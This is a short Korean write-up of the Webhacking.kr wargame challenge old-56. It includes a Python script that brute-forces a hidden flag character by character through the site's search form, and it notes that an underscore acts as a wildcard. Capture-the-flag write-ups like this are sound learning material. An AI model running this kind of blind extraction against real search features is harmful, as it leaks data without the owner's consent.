Webhacking.kr old-56 풀이

readme 파일을 클릭하면 access denied가 뜬다

대충 readme 파일에 flag가 있는거 같다.

 

hi 파일에는 hello~ 라는 문자만 있고 해서 search에 hello를 쳐봤는데 guest 테이블 밖에 안나왔다.

그래서 flag{ 도 쳐봤는데 admin테이블만 나왔다.

그럼 flag{ 뒤의 문자열을 무차별 대입해서 찾아내기만 하면 된다!

버프스위트의 인트루더 기능을 사용해보고 싶었는데 시간이 너무 오래 걸리고 사용법도 익숙치 않아서 파이썬으로 넘어왔다.

 

from requests import post

host = "https://webhacking.kr/challenge/web-33/"

password ="flag{"
str = "acdefghiklmnostuy_"
isStr = False

while True:
    for s in str:
        r = post(host, data={'search':password+s})
        if "admin" in r.text:
            isStr = True
            password+=s
            print(password)
            break
    
    if isStr == False:
        break
    isStr = False

password+='}'

print(password)

 

str 문자에 있는 값들은 대충 버프스위트 인트루더 기능을 돌려보니깐 저 문자 중에 있다는걸 확인했고 시간을 줄이고자 대충 저 문자들만 적어놨다.

그리고 password에 문자를 하나씩 대입해가며 admin만 나오는걸 찾으면 되는데 

돌려보니 결과가 이렇게 나왔다. 

search에 _ 를 넣으면 그냥 아무것도 없는 문자 취급해서 통과시키는데 그래서인지 마지막에 so 뒤에 _가 두번 나왔다.

그래서 저 so가 끝인줄 알고 flag 대입해봤는데 뒤에 문자가 더있는지 통과가 되지않았다.

그래서 대충 ? 추가해보니 통과 됐다 ㄷㄷ;

(flag 내용이 심상치 않음...)